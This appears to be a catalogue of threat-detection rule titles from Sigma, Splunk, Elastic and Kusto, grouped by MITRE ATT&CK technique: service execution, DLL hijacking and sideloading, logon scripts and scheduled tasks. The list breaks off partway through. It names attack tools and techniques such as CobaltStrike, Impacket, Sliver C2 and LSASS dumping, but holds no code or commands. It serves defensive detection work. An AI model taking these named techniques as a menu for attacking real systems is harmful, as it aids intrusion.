- Sigma CobaltStrike Service Installations - Security test
- Sigma CobaltStrike Service Installations - System test
- Sigma CosmicDuke Service Installation test
- Sigma Credential Dumping Tools Service Execution - Security test
- Sigma Credential Dumping Tools Service Execution - System test
- Sigma CSExec Service File Creation test
- Sigma CSExec Service Installation test
- Sigma CVE-2021-1675 Print Spooler Exploitation test
- Sigma CVE-2021-1675 Print Spooler Exploitation IPC Access test
- Splunk Detect Renamed PSExec production
- Kusto Dev-0228 File Path Hashes November 2021
- Kusto Dev-0228 File Path Hashes November 2021 (ASIM Version)
- Sigma DNS RCE CVE-2020-1350 test
- Splunk Excessive Usage Of SC Service Utility production
- Splunk First Time Seen Running Windows Service experimental
- Sigma HackTool - SharpUp PrivEsc Tool Execution test
- Sigma HackTool Service Registration or Execution test
- Splunk Impacket PSexec (Windows Event Log)
- Splunk Impacket SMBexec (Windows Event Log)
- Sigma KrbRelayUp service installation (native) experimental
- Splunk Malicious Powershell Executed As A Service production
- Sigma Massive remote service creation via named pipes (TChopper, CME) experimental
- Sigma Massive remote service creation via named pipes - Tchopper experimental
- Sigma Massive service installation - Tchopper experimental
- Sigma Metasploit Or Impacket Service Installation Via SMB PsExec test
- Sigma PAExec Service Installation test
- Sigma Possible CVE-2021-1675 Print Spooler Exploitation test
- Sigma Potential CobaltStrike Service Installations - Registry test
- Sigma Potential CVE-2022-26809 Exploitation Attempt test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Sigma PowerShell as a Service in Registry test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell Scripts Installed as Services test
- Sigma PowerShell Scripts Installed as Services - Security test
- Sigma ProcessHacker Privilege Elevation test
- Sigma PSExec and WMI Process Creations Block test
- Sigma PSexec application execution experimental
- Sigma PsExec Default Named Pipe test
- Sigma Psexec Execution test
- Elastic PsExec Network Connection production
- Splunk PSexec Service Creation (Windows Event Log)
- Sigma PsExec Service File Creation test
- Sigma PsExec Service Installation test
- Sigma PsExec Tool Execution From Suspicious Locations - PipeName test
- Sigma PUA - CSExec Default Named Pipe test
- Sigma PUA - CsExec Execution test
- Sigma PUA - NirCmd Execution test
- Sigma PUA - NirCmd Execution As LOCAL SYSTEM test
- Sigma PUA - NSudo Execution test
- Sigma PUA - PAExec Default Named Pipe test
- Sigma PUA - RemCom Default Named Pipe test
- Sigma PUA - RunXCmd Execution test
- Sigma RemCom Service File Creation test
- Sigma RemCom Service Installation test
- Sigma Remote Access Tool Services Have Been Installed - Security test
- Sigma Remote Access Tool Services Have Been Installed - System test
- Splunk Remote Admin Tools (EDR)
- Splunk Remote Admin Tools (PowerShell)
- Splunk Remote Admin Tools (Sysmon)
- Splunk Remote Admin Tools (Windows Event Log)
- Sigma Remote service creation via named pipes experimental
- Elastic Remote Windows Service Installed production
- Elastic Remotely Started Services via RPC production
- Sigma Renamed Procdump tool used for dumping LSASS process experimental
- Sigma Rundll32 Execution Without Parameters test
- Elastic Service Command Lateral Movement production
- Elastic Service Control Spawned via Script Interpreter production
- Splunk Service Created containing Command Shell (Windows Event Log)
- Splunk Service Installed (Windows Event Log)
- Splunk SimpleHelp Remote Access Tool Service Installation (Windows Event Log)
- Sigma Sliver C2 Default Service Installation test
- Sigma smbexec.py Service Installation test
- Sigma Start Windows Service Via Net.EXE test
- Elastic Suspicious Process Execution via Renamed PsExec Executable production
- Elastic System Shells via Services production
- Elastic Unsigned DLL Loaded by Svchost production
- Sigma WFP Filter Added via Registry experimental
- Splunk Windows ScManager Security Descriptor Tampering Via Sc.EXE production
- Splunk Windows Service Create SliverC2 production
- Splunk Windows Service Created (Sysmon)
- Splunk Windows Service Created (Windows Event Log)
- Splunk Windows Service Created with Suspicious Service Name production
- Splunk Windows Service Created with Suspicious Service Path production
- Splunk Windows Service Execution RemCom production
- Splunk Windows Service Started (PowerShell)
- Splunk Windows Service Started (Sysmon)
- Splunk Windows Service Started (Windows Event Log)
- Splunk Windows Snake Malware Service Create production
System Services: Service Execution T1569.002 76 rules
- Sigma CobaltStrike Service Installations - Security test
- Sigma CobaltStrike Service Installations - System test
- Sigma CosmicDuke Service Installation test
- Sigma Credential Dumping Tools Service Execution - Security test
- Sigma Credential Dumping Tools Service Execution - System test
- Sigma CSExec Service File Creation test
- Sigma CSExec Service Installation test
- Splunk Detect Renamed PSExec production
- Sigma DNS RCE CVE-2020-1350 test
- Splunk Excessive Usage Of SC Service Utility production
- Splunk First Time Seen Running Windows Service experimental
- Sigma HackTool - SharpUp PrivEsc Tool Execution test
- Sigma HackTool Service Registration or Execution test
- Splunk Impacket PSexec (Windows Event Log)
- Splunk Impacket SMBexec (Windows Event Log)
- Splunk Malicious Powershell Executed As A Service production
- Sigma Metasploit Or Impacket Service Installation Via SMB PsExec test
- Sigma PAExec Service Installation test
- Sigma Potential CobaltStrike Service Installations - Registry test
- Sigma Potential CVE-2022-26809 Exploitation Attempt test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Sigma PowerShell as a Service in Registry test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell Scripts Installed as Services test
- Sigma PowerShell Scripts Installed as Services - Security test
- Sigma ProcessHacker Privilege Elevation test
- Sigma PSExec and WMI Process Creations Block test
- Sigma PSexec application execution experimental
- Sigma PsExec Default Named Pipe test
- Elastic PsExec Network Connection production
- Splunk PSexec Service Creation (Windows Event Log)
- Sigma PsExec Service File Creation test
- Sigma PsExec Service Installation test
- Sigma PsExec Tool Execution From Suspicious Locations - PipeName test
- Sigma PUA - CSExec Default Named Pipe test
- Sigma PUA - CsExec Execution test
- Sigma PUA - NirCmd Execution test
- Sigma PUA - NirCmd Execution As LOCAL SYSTEM test
- Sigma PUA - NSudo Execution test
- Sigma PUA - PAExec Default Named Pipe test
- Sigma PUA - RemCom Default Named Pipe test
- Sigma PUA - RunXCmd Execution test
- Sigma RemCom Service File Creation test
- Sigma RemCom Service Installation test
- Sigma Remote Access Tool Services Have Been Installed - Security test
- Sigma Remote Access Tool Services Have Been Installed - System test
- Splunk Remote Admin Tools (EDR)
- Splunk Remote Admin Tools (PowerShell)
- Splunk Remote Admin Tools (Sysmon)
- Splunk Remote Admin Tools (Windows Event Log)
- Elastic Remote Windows Service Installed production
- Elastic Remotely Started Services via RPC production
- Sigma Renamed Procdump tool used for dumping LSASS process experimental
- Sigma Rundll32 Execution Without Parameters test
- Elastic Service Command Lateral Movement production
- Elastic Service Control Spawned via Script Interpreter production
- Splunk Service Created containing Command Shell (Windows Event Log)
- Splunk SimpleHelp Remote Access Tool Service Installation (Windows Event Log)
- Sigma Sliver C2 Default Service Installation test
- Sigma smbexec.py Service Installation test
- Sigma Start Windows Service Via Net.EXE test
- Elastic Suspicious Process Execution via Renamed PsExec Executable production
- Elastic System Shells via Services production
- Elastic Unsigned DLL Loaded by Svchost production
- Sigma WFP Filter Added via Registry experimental
- Splunk Windows ScManager Security Descriptor Tampering Via Sc.EXE production
- Splunk Windows Service Create SliverC2 production
- Splunk Windows Service Created (Sysmon)
- Splunk Windows Service Created (Windows Event Log)
- Splunk Windows Service Created with Suspicious Service Name production
- Splunk Windows Service Created with Suspicious Service Path production
- Splunk Windows Service Execution RemCom production
- Splunk Windows Service Started (PowerShell)
- Splunk Windows Service Started (Sysmon)
- Splunk Windows Service Started (Windows Event Log)
- Splunk Windows Snake Malware Service Create production
Hijack Execution Flow T1574 183 rules
- Sigma Abuse of Service Permissions to Hide Services Via Set-Service test
- Sigma Abuse of Service Permissions to Hide Services Via Set-Service - PS test
- Sigma APT27 - Emissary Panda Activity test
- Sigma Aruba Network Service Potential DLL Sideloading test
- Sigma Changing Existing Service ImagePath Value Via Reg.EXE test
- Kusto COM Registry Key Modified to Point to File in Color Profile Folder
- Sigma Creation Of Non-Existent System DLL test
- Sigma Creation of WerFault.exe/Wer.dll in Unusual Folder test
- Elastic Deprecated - Adobe Hijack Persistence production
- Elastic Deprecated - Suspicious PrintSpooler Service Executable File Creation production
- Splunk Detect Path Interception By Creation Of program exe production
- Kusto Detect Suspicious Commands Initiated by Webserver Processes available
- Sigma DHCP Callout DLL Installation test
- Sigma DHCP Server Error Failed Loading the CallOut DLL test
- Sigma DHCP Server Loaded the CallOut DLL test
- Sigma Diamond Sleet APT DLL Sideloading Indicators test
- Sigma DLL Execution Via Register-cimprovider.exe test
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma DLL Names Used By SVR For GraphicalProton Backdoor test
- Sigma DLL Search Order Hijackig Via Additional Space in Path test
- Sigma DLL ServerLevelPluginDll command installation experimental
- Sigma DLL ServerLevelPluginDll registration ("serverlevelplugindll" feature abuse) experimental
- Sigma DLL ServerLevelPluginDll registration (Reg via Sysmon) experimental
- Sigma DLL Sideloading by VMware Xfer Utility test
- Sigma DLL Sideloading Of ShellChromeAPI.DLL test
- Sigma DNS Server Error Failed Loading the ServerLevelPluginDLL test
- Sigma Enabling COR Profiler Environment Variables test
- Sigma Exploiting SetupComplete.cmd CVE-2019-1378 test
- Sigma Fax Service DLL Search Order Hijack test
- Splunk GitHub Workflow File Creation or Modification production
- Sigma HackTool - Powerup Write Hijack DLL test
- Sigma HackTool - SharpUp PrivEsc Tool Execution test
- Kusto Hijack Execution Flow - DLL Side-Loading available
- Splunk iphlpapi.dll File Write to Appdata_Local_Microsoft (Sysmon)
- Sigma Lazarus APT DLL Sideloading Activity test
- Sigma Malicious DLL File Dropped in the Teams or OneDrive Folder test
- Sigma Microsoft Defender Blocked from Loading Unsigned DLL test
- Sigma Microsoft Office DLL Sideload test
- Splunk MSI Module Loaded by Non-System Binary production
- Splunk Msmpeng Application DLL Side Loading production
- Sigma New DNS ServerLevelPluginDll Installed test
- Sigma New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE test
- Elastic Persistence via TelemetryController Scheduled Task Hijack production
- Elastic Persistence via Update Orchestrator Service Hijack production
- Sigma Pingback Backdoor Activity test
- Sigma Pingback Backdoor DLL Loading Activity test
- Sigma Pingback Backdoor File Indicators test
- Sigma Possible impact of 'SMOKEDHAM backdoor' with MSDTC service privilege escalation via command line production
- Sigma Possible Privilege Escalation via Weak Service Permissions test
- Sigma Potential 7za.DLL Sideloading test
- Sigma Potential Antivirus Software DLL Sideloading test
- Sigma Potential appverifUI.DLL Sideloading test
- Sigma Potential AVKkid.DLL Sideloading test
- Sigma Potential Azure Browser SSO Abuse test
- Sigma Potential CCleanerDU.DLL Sideloading test
- Sigma Potential CCleanerReactivator.DLL Sideloading test
- Sigma Potential Chrome Frame Helper DLL Sideloading test
- Elastic Potential DLL Side-Loading via Trusted Microsoft Programs production
- Sigma Potential DLL Sideloading Of DBGCORE.DLL test
- Sigma Potential DLL Sideloading Of DBGHELP.DLL test
- Sigma Potential DLL Sideloading Of DbgModel.DLL test
- Sigma Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE test
- Sigma Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE test
- Sigma Potential DLL Sideloading Of MpSvc.DLL test
- Sigma Potential DLL Sideloading Of MsCorSvc.DLL test
- Sigma Potential DLL Sideloading Of Non-Existent DLLs From System Folders test
- Sigma Potential DLL Sideloading Via ClassicExplorer32.dll test
- Sigma Potential DLL Sideloading Via comctl32.dll test
- Sigma Potential DLL Sideloading Via DeviceEnroller.EXE test
- Sigma Potential DLL Sideloading Via JsSchHlp test
- Sigma Potential DLL Sideloading Via VMware Xfer test
- Sigma Potential EACore.DLL Sideloading test
- Sigma Potential Edputil.DLL Sideloading test
- Elastic Potential Exploitation of an Unquoted Service Path Vulnerability production
- Sigma Potential Goopdate.DLL Sideloading test
- Sigma Potential Initial Access via DLL Search Order Hijacking test
- Sigma Potential Iviewers.DLL Sideloading test
- Sigma Potential JLI.dll Side-Loading experimental
- Sigma Potential Libvlc.DLL Sideloading test
- Sigma Potential Mfdetours.DLL Sideloading test
- Sigma Potential Mpclient.DLL Sideloading test
- Sigma Potential Mpclient.DLL Sideloading Via Defender Binaries test
- Sigma Potential Notepad++ CVE-2025-49144 Exploitation experimental
- Sigma Potential Persistence Attempt Via Existing Service Tampering test
- Sigma Potential PlugX Activity test
- Sigma Potential PrintNightmare Exploitation Attempt test
- Elastic Potential Privilege Escalation via InstallerFileTakeOver production
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Sigma Potential Privilege Escalation via Service Permissions Weakness test
- Sigma Potential Python DLL SideLoading test
- Sigma Potential Raspberry Robin Aclui Dll SideLoading test
- Sigma Potential Rcdll.DLL Sideloading test
- Sigma Potential Registry Persistence Attempt Via DbgManagedDebugger test
- Sigma Potential RjvPlatform.DLL Sideloading From Default Location test
- Sigma Potential RjvPlatform.DLL Sideloading From Non-Default Location test
- Sigma Potential RoboForm.DLL Sideloading test
- Sigma Potential ShellDispatch.DLL Sideloading test
- Sigma Potential SmadHook.DLL Sideloading test
- Sigma Potential SolidPDFCreator.DLL Sideloading test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Potential System DLL Sideloading From Non System Locations test
- Sigma Potential Vcruntime140 DLL Sideloading experimental
- Sigma Potential Vivaldi_elf.DLL Sideloading test
- Sigma Potential Waveedit.DLL Sideloading test
- Sigma Potential Wazuh Security Platform DLL Sideloading test
- Elastic Potential Windows Session Hijacking via CcmExec production
- Sigma Potential WWlib.DLL Sideloading test
- Sigma Potentially Suspicious Child Process of KeyScrambler.exe test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Privilege Escalation via Windir Environment Variable production
- Splunk Reg exe Manipulating Windows Services Registry Keys production
- Sigma Registry Modification for OCI DLL Redirection experimental
- Sigma Registry-Free Process Scope COR_PROFILER test
- Sigma Regsvr32 DLL Execution With Uncommon Extension test
- Sigma Renamed Vmnat.exe Execution test
- Sigma Service abuse with malicious ImagePath (Reg via command) experimental
- Sigma Service DACL Abuse To Hide Services Via Sc.EXE test
- Sigma Service permissions hijacked for privileges abuse (PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (Reg via PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (service) experimental
- Sigma Service Registry Key Read Access Request test
- Sigma Service Registry Permissions Weakness Check test
- Sigma Service Security Descriptor Tampering Via Sc.EXE test
- Sigma Setup16.EXE Execution With Custom .Lst File test
- Splunk Shai-Hulud Workflow File Creation or Modification production
- Elastic Signed Proxy Execution via MS Work Folders production
- Sigma Small Sieve Malware CommandLine Indicator test
- Sigma Spool process spawned a CMD shell (PrintNightmare vulnerability - CVE-2021-36958) experimental
- Elastic Suspicious DLL Loaded for Persistence or Privilege Escalation production
- Sigma Suspicious GUP Usage test
- Elastic Suspicious Microsoft Antimalware Service Execution production
- Elastic Suspicious Print Spooler Point and Print DLL production
- Sigma Suspicious Printer Driver Empty Manufacturer test
- Sigma Suspicious Service DACL Modification Via Set-Service Cmdlet - PS test
- Sigma Suspicious Unsigned Thor Scanner Execution stable
- Sigma System Control Panel Item Loaded From Uncommon Location test
- Sigma SystemNightmare by GentilKiwi - External printer mapped (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma SystemNightmare by GentilKiwi - New external device added (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma Tasks Folder Evasion test
- Sigma Third Party Software DLL Sideloading test
- Sigma Trusted Path Bypass via Windows Directory Spoofing experimental
- Sigma UAC Bypass With Fake DLL test
- Sigma Unsigned .node File Loaded experimental
- Sigma Unsigned Binary Loaded From Suspicious Location test
- Elastic Unsigned DLL Loaded by a Trusted Process production
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unsigned DLL Side-Loading from a Suspicious Folder production
- Sigma Unsigned Mfdetours.DLL Sideloading test
- Sigma Unsigned Module Loaded by ClickOnce Application test
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
- Elastic Unusual Persistence via Services Registry production
- Sigma Using SettingSyncHost.exe as LOLBin test
- Sigma VMGuestLib DLL Sideload test
- Sigma VMMap Signed Dbghelp.DLL Potential Sideloading test
- Sigma VMMap Unsigned Dbghelp.DLL Potential Sideloading test
- Splunk Windows BitDefender Submission Wizard DLL Sideloading experimental
- Splunk Windows DLL Search Order Hijacking Hunt with Sysmon production
- Splunk Windows DLL Search Order Hijacking with iscsicpl production
- Splunk Windows DLL Side-Loading In Calc production
- Splunk Windows DLL Side-Loading Process Child Of Calc production
- Splunk Windows Get-Variable.EXE Execution from WindowsApps Folder production
- Splunk Windows Hijack Execution Flow Version Dll Side Load production
- Splunk Windows Known Abused DLL Created production
- Splunk Windows Known Abused DLL Loaded Suspiciously production
- Splunk Windows Known GraphicalProton Loaded Modules production
- Splunk Windows Masquerading Explorer As Child Process production
- Splunk Windows Mock Trusted Directory MSC File Creation production
- Splunk Windows Mustang Panda USB Tool Execution production
- Splunk Windows Potential AppDomainManager Hijack Artifacts Creation production
- Splunk Windows PowerShell Module File Created production
- Splunk Windows Rundll32 Execution With Log.DLL production
- Splunk Windows Service Creation Using Registry Entry production
- Splunk Windows Set Custom DNS ServerLevelPlugin Via Dnscmd production
- Sigma Windows Spooler Service Suspicious Binary Load test
- Splunk Windows SqlWriter SQLDumper DLL Sideload production
- Splunk Windows Unsigned DLL Side-Loading production
- Splunk Windows Unsigned DLL Side-Loading In Same Process Path production
- Splunk Windows Unsigned MS DLL Side-Loading production
- Sigma Winnti Malware HK University Campaign test
- Sigma Winnti Pipemon Characteristics stable
- Elastic WPS Office Exploitation via DLL Hijack production
- Sigma Xwizard.EXE Execution From Non-Default Location test
Hijack Execution Flow: DLL T1574.001 118 rules
- Sigma APT27 - Emissary Panda Activity test
- Sigma Aruba Network Service Potential DLL Sideloading test
- Sigma Creation Of Non-Existent System DLL test
- Sigma Creation of WerFault.exe/Wer.dll in Unusual Folder test
- Elastic Deprecated - Suspicious PrintSpooler Service Executable File Creation production
- Sigma DHCP Callout DLL Installation test
- Sigma DHCP Server Error Failed Loading the CallOut DLL test
- Sigma DHCP Server Loaded the CallOut DLL test
- Sigma Diamond Sleet APT DLL Sideloading Indicators test
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma DLL Names Used By SVR For GraphicalProton Backdoor test
- Sigma DLL Search Order Hijackig Via Additional Space in Path test
- Sigma DLL Sideloading by VMware Xfer Utility test
- Sigma DLL Sideloading Of ShellChromeAPI.DLL test
- Sigma DNS Server Error Failed Loading the ServerLevelPluginDLL test
- Sigma Fax Service DLL Search Order Hijack test
- Sigma HackTool - Powerup Write Hijack DLL test
- Sigma Lazarus APT DLL Sideloading Activity test
- Sigma Malicious DLL File Dropped in the Teams or OneDrive Folder test
- Sigma Microsoft Defender Blocked from Loading Unsigned DLL test
- Sigma Microsoft Office DLL Sideload test
- Splunk MSI Module Loaded by Non-System Binary production
- Splunk Msmpeng Application DLL Side Loading production
- Sigma New DNS ServerLevelPluginDll Installed test
- Sigma New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE test
- Sigma Pingback Backdoor Activity test
- Sigma Pingback Backdoor DLL Loading Activity test
- Sigma Pingback Backdoor File Indicators test
- Sigma Potential 7za.DLL Sideloading test
- Sigma Potential Antivirus Software DLL Sideloading test
- Sigma Potential appverifUI.DLL Sideloading test
- Sigma Potential AVKkid.DLL Sideloading test
- Sigma Potential Azure Browser SSO Abuse test
- Sigma Potential CCleanerDU.DLL Sideloading test
- Sigma Potential CCleanerReactivator.DLL Sideloading test
- Sigma Potential Chrome Frame Helper DLL Sideloading test
- Elastic Potential DLL Side-Loading via Trusted Microsoft Programs production
- Sigma Potential DLL Sideloading Of DBGCORE.DLL test
- Sigma Potential DLL Sideloading Of DBGHELP.DLL test
- Sigma Potential DLL Sideloading Of DbgModel.DLL test
- Sigma Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE test
- Sigma Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE test
- Sigma Potential DLL Sideloading Of MpSvc.DLL test
- Sigma Potential DLL Sideloading Of MsCorSvc.DLL test
- Sigma Potential DLL Sideloading Of Non-Existent DLLs From System Folders test
- Sigma Potential DLL Sideloading Via ClassicExplorer32.dll test
- Sigma Potential DLL Sideloading Via comctl32.dll test
- Sigma Potential DLL Sideloading Via DeviceEnroller.EXE test
- Sigma Potential DLL Sideloading Via JsSchHlp test
- Sigma Potential DLL Sideloading Via VMware Xfer test
- Sigma Potential EACore.DLL Sideloading test
- Sigma Potential Edputil.DLL Sideloading test
- Sigma Potential Goopdate.DLL Sideloading test
- Sigma Potential Initial Access via DLL Search Order Hijacking test
- Sigma Potential Iviewers.DLL Sideloading test
- Sigma Potential JLI.dll Side-Loading experimental
- Sigma Potential Libvlc.DLL Sideloading test
- Sigma Potential Mfdetours.DLL Sideloading test
- Sigma Potential Mpclient.DLL Sideloading test
- Sigma Potential Mpclient.DLL Sideloading Via Defender Binaries test
- Sigma Potential PlugX Activity test
- Sigma Potential Python DLL SideLoading test
- Sigma Potential Raspberry Robin Aclui Dll SideLoading test
- Sigma Potential Rcdll.DLL Sideloading test
- Sigma Potential RjvPlatform.DLL Sideloading From Default Location test
- Sigma Potential RjvPlatform.DLL Sideloading From Non-Default Location test
- Sigma Potential RoboForm.DLL Sideloading test
- Sigma Potential ShellDispatch.DLL Sideloading test
- Sigma Potential SmadHook.DLL Sideloading test
- Sigma Potential SolidPDFCreator.DLL Sideloading test
- Sigma Potential System DLL Sideloading From Non System Locations test
- Sigma Potential Vcruntime140 DLL Sideloading experimental
- Sigma Potential Vivaldi_elf.DLL Sideloading test
- Sigma Potential Waveedit.DLL Sideloading test
- Sigma Potential Wazuh Security Platform DLL Sideloading test
- Elastic Potential Windows Session Hijacking via CcmExec production
- Sigma Potential WWlib.DLL Sideloading test
- Sigma Potentially Suspicious Child Process of KeyScrambler.exe test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Registry Modification for OCI DLL Redirection experimental
- Sigma Renamed Vmnat.exe Execution test
- Sigma Small Sieve Malware CommandLine Indicator test
- Elastic Suspicious DLL Loaded for Persistence or Privilege Escalation production
- Sigma Suspicious GUP Usage test
- Elastic Suspicious Microsoft Antimalware Service Execution production
- Sigma Suspicious Unsigned Thor Scanner Execution stable
- Sigma System Control Panel Item Loaded From Uncommon Location test
- Sigma Tasks Folder Evasion test
- Sigma Third Party Software DLL Sideloading test
- Sigma UAC Bypass With Fake DLL test
- Sigma Unsigned .node File Loaded experimental
- Sigma Unsigned Binary Loaded From Suspicious Location test
- Elastic Unsigned DLL Loaded by a Trusted Process production
- Elastic Unsigned DLL Side-Loading from a Suspicious Folder production
- Sigma Unsigned Mfdetours.DLL Sideloading test
- Sigma Unsigned Module Loaded by ClickOnce Application test
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
- Sigma VMGuestLib DLL Sideload test
- Sigma VMMap Signed Dbghelp.DLL Potential Sideloading test
- Sigma VMMap Unsigned Dbghelp.DLL Potential Sideloading test
- Splunk Windows DLL Search Order Hijacking Hunt with Sysmon production
- Splunk Windows DLL Search Order Hijacking with iscsicpl production
- Splunk Windows DLL Side-Loading In Calc production
- Splunk Windows DLL Side-Loading Process Child Of Calc production
- Splunk Windows Hijack Execution Flow Version Dll Side Load production
- Splunk Windows Known Abused DLL Created production
- Splunk Windows Known Abused DLL Loaded Suspiciously production
- Splunk Windows Known GraphicalProton Loaded Modules production
- Splunk Windows Masquerading Explorer As Child Process production
- Splunk Windows Mustang Panda USB Tool Execution production
- Splunk Windows SqlWriter SQLDumper DLL Sideload production
- Splunk Windows Unsigned DLL Side-Loading production
- Splunk Windows Unsigned DLL Side-Loading In Same Process Path production
- Splunk Windows Unsigned MS DLL Side-Loading production
- Sigma Winnti Malware HK University Campaign test
- Sigma Winnti Pipemon Characteristics stable
- Elastic WPS Office Exploitation via DLL Hijack production
- Sigma Xwizard.EXE Execution From Non-Default Location test
Hijack Execution Flow: DLL Side-Loading T1574.002 10 rules
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma DLL ServerLevelPluginDll command installation experimental
- Sigma DLL ServerLevelPluginDll registration ("serverlevelplugindll" feature abuse) experimental
- Sigma DLL ServerLevelPluginDll registration (Reg via Sysmon) experimental
- Kusto Hijack Execution Flow - DLL Side-Loading available
- Splunk iphlpapi.dll File Write to Appdata_Local_Microsoft (Sysmon)
- Sigma Possible impact of 'SMOKEDHAM backdoor' with MSDTC service privilege escalation via command line production
- Sigma Spool process spawned a CMD shell (PrintNightmare vulnerability - CVE-2021-36958) experimental
- Sigma SystemNightmare by GentilKiwi - External printer mapped (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma SystemNightmare by GentilKiwi - New external device added (CVE-2021-1675 / CVE-2021-34527) experimental
Hijack Execution Flow: Dylib Hijacking T1574.004 1 rule
- Kusto Powershell Empire Cmdlets Executed in Command Line available
Hijack Execution Flow: Executable Installer File Permissions Weakness T1574.005 2 rules
- Sigma HackTool - SharpUp PrivEsc Tool Execution test
- Sigma Setup16.EXE Execution With Custom .Lst File test
Hijack Execution Flow: Dynamic Linker Hijacking T1574.006 2 rules
- Splunk GitHub Workflow File Creation or Modification production
- Splunk Shai-Hulud Workflow File Creation or Modification production
Hijack Execution Flow: Path Interception by PATH Environment Variable T1574.007 5 rules
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma Potential Suspicious Activity Using SeCEdit test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Privilege Escalation via Windir Environment Variable production
- Sigma Trusted Path Bypass via Windows Directory Spoofing experimental
Hijack Execution Flow: Path Interception by Search Order Hijacking T1574.008 6 rules
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma Potential Notepad++ CVE-2025-49144 Exploitation experimental
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Signed Proxy Execution via MS Work Folders production
- Sigma Using SettingSyncHost.exe as LOLBin test
- Splunk Windows Get-Variable.EXE Execution from WindowsApps Folder production
Hijack Execution Flow: Path Interception by Unquoted Path T1574.009 4 rules
- Splunk Detect Path Interception By Creation Of program exe production
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Elastic Potential Exploitation of an Unquoted Service Path Vulnerability production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
Hijack Execution Flow: Services File Permissions Weakness T1574.010 6 rules
- Elastic Deprecated - Adobe Hijack Persistence production
- Sigma Service abuse with malicious ImagePath (Reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (Reg via PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (service) experimental
Hijack Execution Flow: Services Registry Permissions Weakness T1574.011 17 rules
- Sigma Abuse of Service Permissions to Hide Services Via Set-Service test
- Sigma Abuse of Service Permissions to Hide Services Via Set-Service - PS test
- Sigma Changing Existing Service ImagePath Value Via Reg.EXE test
- Elastic Persistence via Update Orchestrator Service Hijack production
- Sigma Possible Privilege Escalation via Weak Service Permissions test
- Sigma Potential Persistence Attempt Via Existing Service Tampering test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Sigma Potential Privilege Escalation via Service Permissions Weakness test
- Splunk Reg exe Manipulating Windows Services Registry Keys production
- Sigma Service DACL Abuse To Hide Services Via Sc.EXE test
- Sigma Service Registry Key Read Access Request test
- Sigma Service Registry Permissions Weakness Check test
- Sigma Service Security Descriptor Tampering Via Sc.EXE test
- Sigma Suspicious Service DACL Modification Via Set-Service Cmdlet - PS test
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unusual Persistence via Services Registry production
- Splunk Windows Service Creation Using Registry Entry production
Persistence
Boot or Logon Initialization Scripts T1037 10 rules
- Splunk Logon Script Event Trigger Execution production
- Splunk Logon Script Registry Key added (EDR)
- Splunk Logon Script Registry Key added (PowerShell)
- Splunk Logon Script Registry Key added (Sysmon)
- Splunk Logon Script Registry Key added (Windows Event Log)
- Sigma Potential Persistence Via Logon Scripts - CommandLine test
- Sigma Potential Persistence Via Logon Scripts - Registry test
- Elastic Startup/Logon Script added to Group Policy Object production
- Elastic Uncommon Registry Persistence Change production
- Sigma Uncommon Userinit Child Process test
Boot or Logon Initialization Scripts: Logon Script (Windows) T1037.001 8 rules
- Splunk Logon Script Event Trigger Execution production
- Splunk Logon Script Registry Key added (EDR)
- Splunk Logon Script Registry Key added (PowerShell)
- Splunk Logon Script Registry Key added (Sysmon)
- Splunk Logon Script Registry Key added (Windows Event Log)
- Sigma Potential Persistence Via Logon Scripts - CommandLine test
- Sigma Potential Persistence Via Logon Scripts - Registry test
- Sigma Uncommon Userinit Child Process test
Scheduled Task/Job T1053 133 rules
- Elastic A scheduled task was created production
- Elastic At.exe Command Lateral Movement production
- Kusto AV detections related to Tarrask malware available
- Sigma ChromeLoader Malware Execution test
- Splunk Create_Modify Schtasks (PowerShell)
- Splunk Create_Modify Schtasks (Sysmon)
- Splunk Create_Modify Schtasks (Windows Event Log)
- Sigma Defrag Deactivation test
- Sigma Defrag Deactivation - Security test
- Sigma Diamond Sleet APT Scheduled Task Creation test
- Sigma Fortinet APT group abuse on Windows (task) experimental
- Sigma HackTool - CrackMapExec Execution test
- Sigma HackTool - CrackMapExec Execution Patterns stable
- Sigma HackTool - Default PowerSploit/Empire Scheduled Task Creation test
- Sigma HackTool - SharPersist Execution test
- Sigma HAFNIUM Exchange Exploitation Activity test
- Splunk Hidden Scheduled Task Created - Windows (Windows Event Log)
- Splunk Impacket atexec.py Execution (PowerShell)
- Splunk Impacket atexec.py Execution (Sysmon)
- Splunk Impacket atexec.py Execution (Windows Event Log)
- Splunk Impacket atexec.py Scheduled Task Creation (Windows Event Log)
- Splunk Impacket atexec.py Temp File Creation (Sysmon)
